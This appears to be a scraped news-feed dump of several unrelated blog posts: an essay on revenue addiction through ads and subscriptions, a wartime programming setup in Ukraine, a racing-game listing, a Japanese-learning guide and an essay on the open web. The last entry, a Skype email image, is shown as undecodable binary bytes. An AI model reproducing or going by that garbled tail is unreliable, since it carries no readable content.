    It happens to the best of us. Your company’s growth has stagnated, and your CFO is asking for new ideas on growing revenue — to increase monetization. You start out with a small experiment of ads — how bad could the impact be? It’s just a small trial. So, the product team starts looking into adding ads to your product, and spiral begins.

    Day 0 (Experimentation)

    Look, we’ll start small. If we get feedback & DSAT (dissatisfaction) increases, we’ll pull back on them. They’re just to help offset the cost of maintaining the services that make our product so compelling. We’ll keep ads off bundle subscribers.

    Day 30 (Rationalization)

    Oh, they didn’t make much money — but that’s because they’re still learning & iterating on the targeting & right partners. That’s also why feedback says they’re annoying because they don’t feel targeted. It’ll get better.

    Day 180 (Dependence)

    Yeah, we are getting a lot of DSAT, but the ad revenue is really going well. It’s helping fund the next big feature, and the CFO loves us and is giving us more headcount to improve the core product.

    Day 365 (Tolerance)

    We know that these have tarnished some customer opinion of the product and has marginally impacted sales in the EU. But that’s been offset by the exponential growth in revenue — which is almost entirely profit, given our 85% margin!

    Day 1095 (Escalation)

    OK, so, we need to target these ads better to try to save the core business — so we can invest in it. For some reason, our sales have started to drop. We also want to focus on increasing the brand quality of the advertisers so we maintain a premium feel. But we also accept that we can’t grow on our core product, so we’re also investing in a cross-platform app, a better web app, and are working with car manufacturers to integrate our apps directly into the vehicles. They’re going to get a cut of the ad revenue. Plus, we’ll get more data access to improve our ad targeting — which we’ll also use to use time & traffic dependent ads.

    Day 1825 (Identity Loss)

    Oh, we make apps & technology products? I thought we were an ads business.

    Seeing the Signs

    There was a rumour in Mark Gurman’s Power On Apple newsletter recently:

    Apple considers monetizing maps in another move to boost services revenue

    … Now, Apple is giving this notion more thought. In a recent all-hands meeting for the Maps group, Apple said monetizing the app is a lever it is exploring. While there is no timeline or active engineering work being done, the company has again floated the idea of charging for prioritization in search results. It also could make certain locations appear more prominently on the map …

    Under a week later, Apple announced ‘News+ Food’ to bolster its News+ subscription service. Their most recent quarterly results showed record subscription revenue driven by 14% YoY growth with 76% margins. Like so many in tech, Apple is becoming addicted to Revenue-as-a-service.

    There’s no way back

    RaaS feels so good — the validation from the market with a pat on the head every time the numbers go up. But there’s no way off this merry go round. Reduce your ads, or lower your subscriptions? The validation stops, and chaos begins. Focus on your core product? Branch out into a new non-RaaS area? You’ll never match the margins or scale of your RaaS products. You are trapped in your addiction.

    ]]>
    https://www.codevoid.net/ruminations/2025/02/23/the-first-hit-is-free.html hacker-news-small-sites-43208150 Fri, 28 Feb 2025 17:29:29 GMT
    <![CDATA[Programming in Wartime]]> thread link) | @veqq
    February 28, 2025 | https://vlnn.dev/2024-05-16-programming-in-wartime.html | archive.org

    My current hardware setup was planned during my onboarding at Apptopia (great company, BTW!) in the beginning of 2022. I’ve decided to try MacOS for the first time in my life (was a Linux user for ~15 years), and have bought myself a M1 Macbook Pro. This was a great decision, mostly not due to the MacOS bells and whistles, but rather due to great battery life and capable processing power, that both led me through the time of blackouts in the late 2022. I was able to more or less use the whole stack locally, building and testing monorepo in around 30 minutes (including all integration tests that were based on services like Cassandra, Apache Druid and Spark ran in Docker Compose infrastructure).

    I’m also using quite big external monitor (34“ Samsung Curved C34H890) that is connected to the M2 Mac Studio. This was my understanding of how ergonomic workplace should look like for me: standing desk, Kinesis Advantage with custom firmware (see https://github.com/vlnn/kinesis-advantage-2), the Apple Trackpad mounted on the keyboard etc. All this fine and dandy except one thing: this setup doesn’t have a battery and is shut down during the power outage. After russian shellings to the pretty much all the Ukrainian power plants infrastructure we’ve experienced blackouts as long as for 12-18 hours per day. This have disrupted my work abilities even lower, making me sometime to work in chunks of 2 hours (of which the overhead of constant household chores like getting the power station ready, dishes clean and teapot hot and ready took pretty much a good half). So 1 hour of work with electricity on, then you go into unknown timeslot of darkness and bad internet (my ISP relied on usual power lines too much. Now I have 4 independent ISP lines, one of which is cellular (i.e. works until mobile network is up – but unreliable and slow) and one is optical (was sluggish at first, requiring the hardware reboots, but quite OK in a year after the installation – I’m actually posting this text during blackout and have no problems with the internet at all)).

    As I had some time and resources, the orders were made for some power supplies (or rather power accumulators) that made our life much easier. I have now two EcoFlows, the bigger one is connected to the fridge and is more of a reserve of electricity for even worse conditions, and the smaller one is powering the wifi APs and ISP’s routers. As I said, desktop and monitor are fully shut down during the power outages, and for now I’m OK with that: I’m just using my macbook.

    But there’s a slight problem – instead of using the ergonomic way of work at my precious stand desk, with hilariously comfortable keyboard and big display, I’ve taught myself to work at macbook sitting at the sofa even when the electricity is allright. Actually I found that I’m more productive that way! Not sure how it works, I guess it’s more of a bad habit becoming a second nature.

    ]]>
    https://vlnn.dev/2024-05-16-programming-in-wartime.html hacker-news-small-sites-43208132 Fri, 28 Feb 2025 17:27:25 GMT
    <![CDATA[Formula simulator racing game – A new racing simulator with realistic physics]]> thread link) | @incendies
    February 28, 2025 | https://www.gaminguides.com/game/formula-simulator-racing-game/ | archive.org

    Description

    Formula Simulator Racing Game

    Experience the thrill of high-speed racing in this immersive 3D Formula racing simulator! Race through a dynamic open world filled with challenging obstacles, collectible coins, and exciting power-ups.

    Key Features:

    ?️ Gameplay
    - Realistic car physics and handling
    - Dynamic day/night cycle
    - Interactive 3D environment with buildings and trees
    - Minimap navigation system with compass
    - Real-time multiplayer racing
    - Lives system with collision penalties

    ? Power-Ups
    - Super Speed Boost: Temporarily increases maximum speed
    - Shield: Provides temporary immunity from collisions
    - Super Jump: Enhanced jumping capability
    - Score Multiplier: Instant point bonus
    - Speed Reduction: Strategic obstacle for challenging gameplay

    ? Features
    - Global leaderboard system
    - Persistent high scores
    - Custom player names
    - Colorful car customization
    - Real-time score tracking
    - Coin collection system

    ? Technical Highlights
    - Built with Three.js for smooth 3D graphics
    - WebSocket integration for multiplayer functionality
    - Responsive design for various screen sizes
    - Optimized sound management system
    - Collision detection system
    - Dynamic lighting effects

    ? Objectives
    - Collect coins to increase your score
    - Avoid collisions with buildings and obstacles
    - Compete for the highest score on the leaderboard
    - Master the racing mechanics
    - Strategically use power-ups
    - Survive with limited lives

    Get ready to race! Enter your name, choose your car color, and compete against players from around the world in this exciting Formula racing experience!

    Instructions

    ? Controls
    - W or Up Arrow: Accelerate
    - S or Down Arrow: Brake/Reverse
    - A/D or Left/Right Arrows: Steering
    - Customizable sound settings

    Categories

    Multiplayer .IO 2 Player Driving

    Tags

    Comments

    ]]>
    https://www.gaminguides.com/game/formula-simulator-racing-game/ hacker-news-small-sites-43208068 Fri, 28 Feb 2025 17:22:29 GMT
    <![CDATA[How I’m Learning Japanese 14 Days In]]> thread link) | @ingve
    February 28, 2025 | https://wavelengths.online/posts/how-im-learning-japanese-14-days-in | archive.org

    I’ve tried to learn Japanese a few times over the years, the earliest attempt at which was some time in high school while I was watching an episode of Fullmetal Alchemist and casually looked up how long it would take.

    I quit as soon as I’d decided to start.

    Years later I was hosting a weekly recap podcast about a Japanese reality show called Terrace House with my friend and thought “it’s silly for me to be talking about this show every week without understanding any Japanese. I need to learn.”

    ↑ Excerpt ↑

    I — an idiot — did almost no research and didn’t ask anybody for help which resulted in buying a textbook called Genki and downloading Duolingo. While Genki is widely used and recommended by many, I found that trying to dive headfirst into it with no assistance and no additional study materials was Decidedly Not the way I was going to learn Japanese and focused all of my time on Duolingo instead. My commutes to and from work each day consisted of about four total hours of train rides, which when focused on cramming as many Duolingo lessons as possible made for a pretty solid amount of study time — though I was unaware of how poor Duolingo would be as a single tool for learning Japanese. I dropped the habit eventually as work became more and more overwhelming and the idea of spending two hours shoving a new language into my skull, then working a high intensity job for eight (but usually more) hours, then spending two more hours in Duolingo on the way home was a really cool way to burn out. 

    Fast forward to two weeks ago and my partner and I had finally decided that we’d spend our honeymoon in Japan at some point this year and the desire to learn popped up again, this time with both of us learning simultaneously. It’s easier to stay committed to a habit when you have a buddy. I did a ton of research, consulted with a few friends who learned the language in a variety of ways, and tried every method and resource I could find before landing on some tools that really do the trick.

    We’ve now both been studying for about two weeks and have made significantly more progress in those two weeks than I did in the months of daily four-hour commuting study via Duolingo years ago, so I thought as a way to share some resources and hold myself accountable I’d write up a post about how to start learning when you know literally nothing. It’s worth mentioning once again: I’m only two weeks into this. My advice may change, I may find new tools and resources, and I may bail from others. If there’s enough interest, I’ll keep this up as a series or update this post over time.

    A note: Sorry to the Android users among you, but as an iOS user some of the apps I recommend will be iOS only. I’ll link to Android versions when possible or other recommended apps if I find them.

    Step One: Learn Hiragana and Katakana

    The first part of learning Japanese is both easy and difficult in equal measure. Easy because it involves a simple step, which is to learn two of the three “alphabets” used in the language which will lay the foundation for the rest of the journey and enable you to understand and utilize more advanced study materials down the line. Difficult because it really comes down to rote memorization and repetition which can be boring or difficult to motivate yourself to do.

    For context: Hiragana and katakana are two sides of the same coin, in that they each contain 46 basic characters that represent the phonetic sounds used in spoken Japanese language. Unlike English where the letter “a” can be used to make a multitude of sounds when found within a word, the hiragana and katakana “a” — あ and ア — pretty much always make the “ah” sound as found in the word “car.” Hiragana is used for most words that originate from Japanese, while katakana is used for “loan words” or words that have been adopted into Japanese but may come from other origins. For example ステーキ is pronounced “su-te-ki” which sounds an awful lot like “steak” and in fact just means “steak” because it’s an English word adapted into Japanese. Fun!

    This means all you need to do for step one is learn the characters and there are a lot of ways to do that depending on how quickly you want to get it done and how you learn best. Duolingo has a great tool for learning these, though the process was much too slow for me. On my end I used the following resources: 

    Learn Hiragana in One Hour

    I recommend watching this video in two thirty minute sessions and breaking out a pen and paper to write the characters down as the host introduces them. People with big brains agree: Writing helps memory. It can be overwhelming, but the mnemonic devices are extremely helpful for this early phase where characters look so wildly different from the English alphabet. It won’t take long for them to become second nature — the mnemonics fade away. Also: Make sure you repeat after Risa out loud to make sure you’re matching the intonation. As the hiragana are the most foundational element of the language learning process, any bad habits here could cause issues down the line. 

    A fun trick I’ve seen a lot of people shout out is tracing the characters with your finger on your other hand if you don’t have a pen and paper present. The order in which you draw each stroke of a character is important, so practicing any way you can is great — even if it’s just on your hand.

    Benkyō (iOS)

    Benkyō is one of a few apps by developer Romain Pellen designed to drill and memorize concepts from the Japanese language via flash cards using a spaced repetition system (SRS). SRS tools basically exist to introduce concepts, then reintroduce them at repeated intervals with the intention of burning them into your long term memory. A character you get right today will appear again in two or three days, while a character you frequently get wrong will appear more often. People Online™ are obsessed with SRS apps. While I found the setup process of Benkyō to be a bit cumbersome — some truly confusing menus in this thing — once I got the hang of it, I found myself crushing the entire hiragana chart within the first two days of study by quizzing myself with the Smart Quiz feature every chance I had. Let me be clear: That pace is not necessary. It’s all dependent on your personal goals here, and mine was to move past this foundational element within my first week if possible. 

    Benkyō is wonderful in that it will continue to scale up with you over time as it includes katakana, common vocabulary, and kanji — the third and most daunting written system used in Japan. Assume from here on out that I’m also using Benkyō for these things in between everything else I recommend. For the Android users among you, check out Dr. Moku.

    TokiniAndy’s Guide to Hiragana and Katakana

    This video will walk you through the katakana and the hiragana simultaneously, which is great for reinforcing what you’ve learned about hiragana while acclimating you to the katakana side of things. Thankfully because the sounds and modifiers are almost exactly the same, learning the basic set of katakana after the entire hiragana set will allow you to intuitively sus out the more complex katakana pairings and rules — it’s a nice boon for motivation whenever you can set yourself up to say “Oh! I know this already!” Just like the above video, I recommend writing and speaking along to really hammer this stuff in before moving back to Benkyō and introducing the flash cards for katakana. 

    Learning both character sets to the point where I have no trouble recognizing them took me about four days of fitting study in around podcasting and my day job and wedding planning and everything else life has to offer. That pace felt a bit breakneck to the point where I was mentally exhausted every night before bed, but worth it to jump to the next piece of the puzzle — and the one that will hypothetically take forever.

    Step Two: Draw the Rest of the Fucking Owl

    So there are about one million different ways to go from here, and because every person is different it means you’ll need to try a few different things to get going. Many people say the first step of learning Japanese is to learn how to learn Japanese, and I’d say that’s almost correct. The first step, once again, is to learn hiragana and katakana… second is learning how to learn Japanese.

    The reason things get so wild here is that people will say that you need to start learning kanji, vocab, and grammar simultaneously and it’s not not true. Learning even the most basic grammar helps make sense of sentence structure, which enables you to discern kanji and vocab words in the context of real written language. Conversely, the more kanji and vocab you learn the easier it will become to intuitively parse new grammatical rules as they’re introduced.

    While some all-in-one resources exist here, they generally cost a pretty decent chunk of cash. My first bit of advice before I get into what I’m personally using is to figure out which tools and what pace you can stick with. Take advice from 2017 daily-four-hour-Duolingo Brendon: Don’t burn out and don’t go all-in on a single resource. Building strong foundational habits here is key for long term success. I’ve only been learning Japanese in earnest for about two weeks, but I’ve been doing things like podcasting every week for years and years and the same principle applies to pretty much every long-term endeavor. This means balancing what you want to accomplish with what you need to maintain a healthy life — so rest often!! Progress is progress, and sometimes forgetting a word you thought you knew yesterday is also progress. Learning is weird! 

    Duolingo

    Surprise! I’m still using Duolingo! Look, it has its fair share of problems, but doing a Duolingo lesson or two every day is better than doing nothing and teaches a few helpful vocab words and grammar points here and there. I’ve had a few instances where my brief daily time in Duolingo actually helped me get a head start in the apps and platforms people recommend instead of Duolingo. There’s a lot of reasonable and unreasonable hate directed at Duolingo’s Japanese course these days. A lot of the prevailing negativity stems from people who tried it years ago and bounced off because it was slow, boring, and sometimes flat-out incorrect. Those early years of a sub-par lesson plan have laid the groundwork for thousands of posts writing the app off entirely sight unseen. Thankfully the Japanese course has undergone a huge overhaul in recent years, and I find myself generally enjoying it in very limited spurts.

    The biggest detractor is how little it teaches from a comprehension perspective and how brutally long it takes to move between units. Japanese is a super contextual language, meaning words and phrases will mean different things and can be shortened and elongated depending on the context of the conversation. Duolingo doesn’t really provide this outside of a “listening practice” lesson every few units. Polite forms and casual forms are mostly glossed over here, and grammar points pop up infrequently enough that you could be cruising through lessons without understanding why you’re saying the things you’re saying in the order you’re saying them. I’m not crushing four hours of lessons a day like I used to, and that’s because my time is better spent elsewhere — but that doesn’t mean Duolingo is as useless as many people online will tell you. Feel it out, but don’t rely on it.

    WaniKani via Tsurukame

    WaniKani seems to be most people’s favorite way of learning the kanji. There are something like 40,000 kanji which is horrifically daunting until you learn that most Japanese people are only taught around 2-3,000 in school for use in daily life. If you’re reading this as a native English speaker, you statistically know around 20,000-30,000 words — helpful perspective! You can learn 10% of those in another language, I believe in you.

    The closest thing to a cheat code you’ll get with kanji is that while it’s possible to brute-force memorize them the way you did with the hiragana and katakana, each kanji character is made up of smaller pieces called “radicals” which can also be learned separately. By learning the meanings of these radicals as the foundational element of your kanji journey, you’ll be able to infer the meaning of kanji over time. This is the core concept behind WaniKani, a flashcard system which teaches the radicals first before building on top of them to lead you into the 2,000 most commonly used characters and 6,000 vocabulary words over time. A friend who taught himself Japanese told me that WaniKani was the reason he “never had a problem” with kanji and I’m starting to see why. As of today I’ve been doing my WaniKani lessons and reviews daily and feel like I’m actually starting to get a handle on the learning process thanks to the way it casually layers helpful mnemonic stories atop each kanji. Just like the hiragana and katakana, you’ll see a kanji like 上 and spend the first few days reciting the mnemonic device in your head to lead you to the answer (in this case: the kanji means “above” and looks like “Joe’s toe sticking out above the ground,” so you know to pronounce it as じょう or “jo-o”), eventually you get to the point where the mnemonic identification phase disappears on a per-kanji basis.

    One note here is that the process takes an extremely long time as the service doles out lessons and reviews over the course of a year+ with no way to speed the process up. Every single day you’ll only be given a handful of new characters and quizzes, and while it might feel like the pace is too slow at the beginning I can already see the brilliance in how they teach their users based on the words and kanji I’ve already learned. I can tell I have a strong foundation for long-term learning based on the progress I’ve already made.

    WaniKani can be accessed via the web, but I use a third party iOS app called Tsurukame to access my lessons. Android users recommend an app called Smouldering Durtles these days. The first few levels are free which will take around a month to complete, and the service then costs $10 a month or $90 a year to access the rest. 


    BunPro

    Grammar is obviously a huge part of understanding any language, and learning Japanese while coming from English can feel wild because the structure of sentences frequently seems completely backwards. From what I’ve read, the biggest trap any prospective Japanese speaker can fall into is trying to assemble the language as a math problem when the best way to learn for long term success is to  first become aware of them, then almost passively watch the rules play out enough that they come subconsciously while you speak and read Japanese. 

    A frequently recommended resource for grammar is called Tae Kim’s Guide which is a free e-book available online, but reads very much like a textbook and requires a lot of undirected study to make your way through. BunPro on the other hand teaches similar concepts using the same SRS method as Benkyō and WaniKani, meaning each day can be spent opening your apps and learning new concepts across the spectrum of the language and reviewing old concepts as directed. 

    My experience with BunPro has been mixed so far in that while I love learning grammar and find it legitimately interesting, I don’t love the way BunPro teaches vocab. Unfortunately, both are necessary to progress through their prebuilt course and I find myself frequently understanding new grammatical rules immediately but get tripped up when the app instead quizzes me on vocab I’d glossed over. My two pieces of advice are as follows:

    1. Do not neglect the vocab side of BunPro as I did as it’s not a tenable way to interact with the service — once again I was led astray by internet strangers I shouldn’t have trusted.

    2. Go into the settings and tone down the daily new vocab words from 10 to 5. Between WaniKani, Duolingo, and some of the other study materials I’m using, adding 10 more vocab words to the mix via BunPro was the thing that would have burnt me out again.

    Anki

    Anki seems to be a religion to most people. On one hand a radiant beacon of light in the language learning journey and on the other a vengeful and hateful diety. Anki is an app built only for spaced repetition flash cards, though it doesn’t come with any cards at first. The app is free for Mac, PC, and web, but costs money on mobile as a one time fee that syncs across all of your devices. I’m going to be honest here: I don’t like it. The settings are a nightmare to maneuver, the process of finding usable decks is frustrating, and the way people talk about the app is like… off putting. There are modern day snake oil salespeople all over the place claiming their Anki deck will get you fluent in Japanese in six months or whatever — obviously untrue. So why is it here?

    The short version is that I can see the potential of how Anki will help me in the long term. For example there are Chrome extensions which will tie into your catalogue of Anki decks and highlight words you know along with words you don’t while watching shows on Netflix or videos on YouTube, allowing you to easily create new flashcards based on the content you’re actually watching. While I’m way too early on in the process to start doing this, I thought it would be helpful to get acclimated with how Anki works via a low-lift deck that I can check in with daily. For that I’ve landed on this free deck by JLab which incorporates elements of the previously mentioned Tae Kim Guide to Japanese Grammar while also incorporating vocab and listening + comprehension practice. As an aside, the video announcing this deck has the single most positive YouTube comment section I’ve ever seen — seems like a good sign!

    What’s Up Next?

    Aside from using the above resources every day, I’m trying out a few things here and there to see if they’re helpful and additive tools. One important element of this is finally returning to the Genki textbook after all these years, but also pairing it with some helpful YouTube playlists to make the lessons a bit easier to parse. This one by Game Gengo is wonderful for adding helpful context to the vocab taught in the book, and this one by TokiniAndy seems solid for grammar. It’s helpful to remember that no one tool will get you to fluency, and I’ve noticed that repeating similar concepts across multiple tools is helping reinforce them.

    While I’m on the topic of Game Gengo, he also has some great recommendations for games to play at all levels and will do in-depth guides for how to play each game in Japanese. Because of him, I picked up a Japanese copy of Dragon Quest XI for Switch so I can (very) slowly make my way through one of my favorite games of all time again — this time as a tool for learning.

    On the listening side, I’ve been spending a lot of idle time while commuting or cleaning the house listening to Nihongo Con Teppei for Beginners and YuYu Japanese, two podcasts with extremely basic Japanese speech and hundreds upon hundreds of episodes in the backlog. I’ve been listening to Teppei’s first few episodes repeatedly over the past two weeks and the realization that I’m starting to understand them in bits and pieces was one of the most shocking developments over the past 14 days. 

    A few more things to shout out here before I wrap up: 

    • Human Japanese - A textbook for your phone with helpful audio by native speakers and simple quizzes as you make your way through.

    • Shashingo - A game for learning Japanese by walking around a tiny Japanese neighborhood and taking photos of objects to create flashcards. I like it!

    • Speak Japanese Naturally - A Youtube channel where someone just vlogs her day and narrates it in Japanese while pointing out objects and having casual conversations with people in daily life. 

    • Jisho - An extremely good web-based Japanese dictionary.

    • Music - It’s music! I’ve been specifically been listening to a lot of city pop albums recently — a phase I get into pretty much every time I can tell winter is starting to recede and make way for spring. This time around, I’ve been spending a lot of time looking up lyrics and trying to better comprehend what’s being said instead of just letting the vocals wash over me.

    And that’s it! It’s a pretty exhaustive list, but that’s because learning a language is hard! I’m under no assumptions that I’ll know how to speak by the time my honeymoon rolls around, but I am hopeful that I’ll have solid habits and a working knowledge of the most basic words needed for low-touch interactions on a daily basis. 

    Good luck to you, too. I hope this helps cut through the noise a bit.

    頑張って。

    ]]>
    https://wavelengths.online/posts/how-im-learning-japanese-14-days-in hacker-news-small-sites-43208009 Fri, 28 Feb 2025 17:18:09 GMT
    <![CDATA[The Open Web and What It Actually Means]]> thread link) | @stevedsimkins
    February 28, 2025 | https://orbiter.host/blog/the-open-web-and-what-it-actually-means/ | archive.org

    When I was in seventh grade, I first took a computers class. This was very basic, but the web was still new, still fresh and exciting. I remember pulling up the Yahoo! homepage and clicking the view source link. I copied the entire source, put it in a text editor, change the logo and the site name to be Justin!, then I saved it as an index.html file. I opened that file, and to my amazement, the browser opened and my own cloned version of Yahoo was displayed.

    This is the open web.

    Later, when I launched my first non-angelfire website, I used an FTP server to upload my folder of HTML, images, and CSS. That folder was then served by a web server to the rest of the world. When the web server company I used no longer met my needs, I used FTP again to upload to a different server.

    This is the open web.

    Much later, when I was building a sports blogging business, I built my content engine around Blogger. Blogger/Blogspot was not open. It allowed you to modifed the HTML in the context of their hosted user interface. I wanted more control and freedom, so I moved everything to WordPress and hosted it on a hosting provider dedicated to WordPress. WordPress is open source and portable. I had control over the code, the content, and the hosting location.

    This is the open web.

    I was working at an EdTech startup that partnered with MIT’s Media Lab to issue digital credentials on the blockchain. The idea was to ensure that credentials could live on even if an institution folded or no longer had access to old registrar records.

    This is the open web.

    I began working at Pinata, the top IPFS pinning service provider. I had learned about IPFS years before I worked at Pinata, and I became obsessed with the idea that files could be open and portable, easily moved across services and applications.

    This is the open web.

    I started Orbiter with Steve because we wanted websites that were simple with no vendor lock-in. The web has grown too complex, and hosting simple websites and web apps requires entirely too much work and creates too much frustration. All while being increasingly closed off behind walled gardens. Orbiter was built to change that. Everything is open source. Every site is open, auditable, and accessible without any of Orbiter’s application logic. Someone can move from Orbiter to somewhere else without needing to contact us. Someone can index all the sites deployed using Orbiter and build incredible things like a hybrid of Stubleupon and the Wayback Machine.

    This is the open web.

    This is all anecdotal, of course. And the specific definition of the open web will vary person to person. However, the underlying theme is that the web should give you freedom. That means access, portability, and flexibility. There are some things it does not mean, though.

    The open web is not free.

    I often see and hear people talk about decentralization and open source software as if part of the definition of this openess is that it is free. That is incorrect. FOSS (free and open source software) does not mean that it is free to host and run the software. It means it’s free to be used however you would like. You don’t have to pay a licensing fee to get the software. Similarly, decentralization does not mean that there is no cost. It means that there is no central point of failure, and it is is up to each participant to ensure open access and the principles of decentralization.

    Perhaps a better way to think about this is to consider the web and some of the tangential technologies. The web is decentralized. It has a standards body, but anyone can build on the web. Anyone can create services. It’s open. However, it is not free. Hosting a website can range in cost from the electricity you pay for a small server in your house to the monthly fee you pay a hosting provider.

    Email (the combined protocols that make up email, that is) is decentralized and open. It is not free. You can run an email server in your home or office, or you can pay a service to manage this at a larger scale or with more distribution and accessibility.

    Blockchain is decentralized, but it is not free. Ignoring the transactions fees that come with blockchains, participating in a blockchain network costs money. Just like with the web and email examples, you can run a blockchain node on your own by paying for the hardware and electricity costs or you can pay a service provider that runs hosted instances.

    IPFS is decentralized but not free. Anyone who wants to can download an IPFS node and run it on their own computer. It’s actually relatively simple. However, if you want to distribute your content across the globe and make it fast, you may choose to pay a provider. This is not free. Nor is running your own node.

    Circling all the way back to the open web and web hosting, hosting is not free. The web, and the ability to host websites, is open and decentralized. However, there is always a cost. The scale of that cost is entirely up to you. Orbiter has a free plan and what we think are generous paid plans. However, you can certainly host your website for free elsewhere. The problem comes when free services are neither open nor actually free.

    Many hosting providers raise money from venture capitalist. This allows them to subsidize the cost of hosting websites with VC money. This trend has happened for at least 15 years now. It creates a false sense that things should be free. When in reality, things are subsidized. When the subsidies end or run out, unexpected bills suddenly present themselves. A lot of times, these bills are significantly higher than if you had just been paying for a sustainable service from the start.

    The open web exists. It is decentralized, much like a lot of the other services that run parallel and compliment the web. Understanding that open does not mean free is a major step toward freeing yourself to pursue solutions that better align with what you actually want to accomplish.

    Orbiter supports the open web. Orbiter is open.

    ]]>
    https://orbiter.host/blog/the-open-web-and-what-it-actually-means/ hacker-news-small-sites-43207821 Fri, 28 Feb 2025 17:00:42 GMT
    <![CDATA[Skype Retirement Email "Important Updates to Skype Paid Services"]]> thread link) | @logicallee
    February 28, 2025 | https://taonexus.com/publicfiles/feb2025/skype-retirement-email-28-february-2025.png | archive.org

    m,÷=Ò\gèIigù*ëßÐCáöë¯ Ñg.MKýX±RuÓ6æÛY°vy¸ï;ׄK¤=ÝæïÜ–7œ?ªíq íI�O^ÿ°zÝÍЪØVìúJ./Óöcý-ÍæŽ»Ô_zGƒ]n¬í÷&†¹/,ŽmèȸW/Ÿ‹}JÛ<¼2ŽAÖÏDÞþ…+ojÞ ŽÑtN츚Ü>i³¿dâûmHŽ5Øy^ó݇¼ùâpÆ‘¼%íWú½*Ãõ±ËY[Õ©³mûxé8—;ò^¼9\ù!öI|¿�Õödè]NX´PCá®{2ÈØ-½ãÆØ¦×wh³ö™UaŽåœÍÙCËï 7Çã†÷D§ãfÌÏ®¸·-RËèŒ5¤Þ+ÙçcÇe¾�çÚ¾£Ïá÷_·(Ìšeã~È‹_^qÔQ�Ë^{î¾½øÖ°bÅ Õ�(ÜÓÒÄÃw~5üç¯b¦k–„ÅßY61DÚâøCÇ�ïÁ·œö{Ë�!,º*<øÉxqC”-¼àúpáÒ3Ãé_©^@2ÿˆ‹ÃõW½*¬úÔiaѧ¸Œ#ç pá·o gì³^Ž9ò¢°tÑåá–C¯ '_°¸ír”Ç_¾~é aAÝIxäæpþÉg…ëŒùŒG~0\û¹SÂÂÂïx(\yìá¢%'„K¿öÜðÅE—”—�°mç,µ~DQΠn ·œ¹�¦—^{zc¥Åpܧ¾.Múv´lïòo¿0\qìEm—«,8ñªðí�æKzñ»ö §_oò*'„«¼´ãe%}î˜pÄG–†>ÿ`¸ô˜(lÀìs)Ð-áŒýD°ã¾ê—„ÓN¼¬ýò›ýN _þË}Âû_‡Ýìx^®{ËÉáüï´�ZXpœì�Ëà zcöâpî~§9ÚÚÉì -á†ð¦û3êû@^n¾àèpVí…G^®ýüIaa‡àaBûdÕÝáÊ·Ÿ.º­áf‘ýÏW}åÂpÔn1߉%—„#޽,<4ÿ¸pñ×. 'í×ì,û.c`[Ï{y8ëúUöü‹ÞÄùáö½Ï·|÷Ý�¡ÊP¸ñÌùß§\»$|ð°ü˜=<\÷‡ç·_¢WÙ_O.ï_tz¸¦á½xÈ9ׇ«ßuˆç�ImgÇh�¥Ÿ=&ó±¥áð�ܾ|ò‚°êŽ‹Â¢7]–68ÕmmŸYå{&},71Ùý²¯øøpúÕYÀ–xñÙáú/¾;Rt~œÏ®‡O¾& {iXò¹$°<\óºCÃûpHøàׇSîk‹°êöpÑëÞÐxÿÐü#>®ÿ|þy*ËÕ§‡E¸=´¿ Ž‘'å³úXù¬n{.G}äÚpÕÉíGçDùá�~þîË׆g?{¿ð–ÿûæ(­BpsÙg?öÚk¯Ž:�øÙÏ~S%?ü§‹Ã}/8?œøü(hâñÛÂçäóã÷ßzDØ=Ц›ç<ç91å8ŽÓŽÏäd<ô™ÓÂé_Ý'œqõ-áÎ;ï w~ór9Á˹ò¶óÃY‹N–G’s® ·Pvç-áò9¡Þ.zÛ•rÚ®qËya‘8ÚáȳÃUßDÿÎpÛ×.V{Ëo:7}ÞâêÉt•8Äœ4Å©ZxòÅá¦ïfu$€Zþ�÷‡cNlr€î—¼Mœ„½� ~òòpùg. ¹‡œk� üŒä? N=j‡ž!e”_>xŒ” Cß9?O00ÿðp6Û|Ï’°äîÛÂM?)ì#ŽÄÍç, —Ü£ª‹Ãy8J‡]¾ûxËÕg‡ÃÅ�Yþ•ÓÃy_³oI_xšµuÆ¡ä„>`ùË?óÖðBÕØJLvÜze8ùuææã~Ëg$Xøå5á §~º¶o‡Ââ Ž×gþÖÆ=÷- ÷|÷¦p1ÇÃò›Ã¹'^îÓýôÂðVÝæ3Â!dœ`û„å´8 Òþ¢c pÄ9ºàËá6i»h¿—}pt8÷–²ÇË¿r–8/–€ã›÷„%÷Ý#ÇéUáì#æË1r~Xôáz^2î>‘àíÊ7.ÒgA6~jÿH9Ф¯§ynXÜÿT8ðáƒâ´‡Uây`8ôÌKìñX<1ÄiΜ«d<ö9)œýFñJyeøô- Ö¹.|ñ›²ÞûŒpÊa&28f%À‘0N�s¶)ß_ÇÖ¶‰÷â‘à,»;%œÁ¿y]¸¡á{„°ä‹áÊÈúØSÃI�žòÆ>|¹8ù±œ>OWÝ&Ÿ§§•÷C-ýÜ¢p Ž|n^xímÖ>ã VÚŽ‘åặ[€sÈ›å|PÙWËåóaQxÿ¦\‚yÁó_^ð‚ç‡x0üàlh;»îºk8ü°ÃUçG?úQ”n òŸü$,[¿6<üã»ÃÝwÿ$<\›�]ûpøÉÝRö¿? �×öéð? ÷TʆÃãKï ?Ï&œýIøá/7sÊËqg"0“³Cñ­sZûî»okßwÞB’í{tëÓK£,ñã�·^®eû¶ŽþÌýQ˜øEëŠß¡ìÕ­+Š¢®hõ_þwµ£¸`ãý­+~�òZï»=ÊZ+[7¼Ùêœü·Ë¢,geëÖw¾ÈÊ¿œÊSÛ²üÞ­û7Fq�ÔŸ|{3Vþç­­»VÆLÆÊ›Ïi@½w§zY{o¾AzTãö÷™¾”åÛ|ë;©st늢`~qùÑÚÆ9ߊ‚´Ùݤq_Öúû?4Ù9ÿÒ4ßh�s€Ù¬ŒßÆ•­»ßÕ>"ùÆ;PýóG‘rkëlüÎ2Š9©ýÉö6´¿ôŠÖ«©÷>ÞJG^Úî¶ãT¶ï{ÿroke§ã 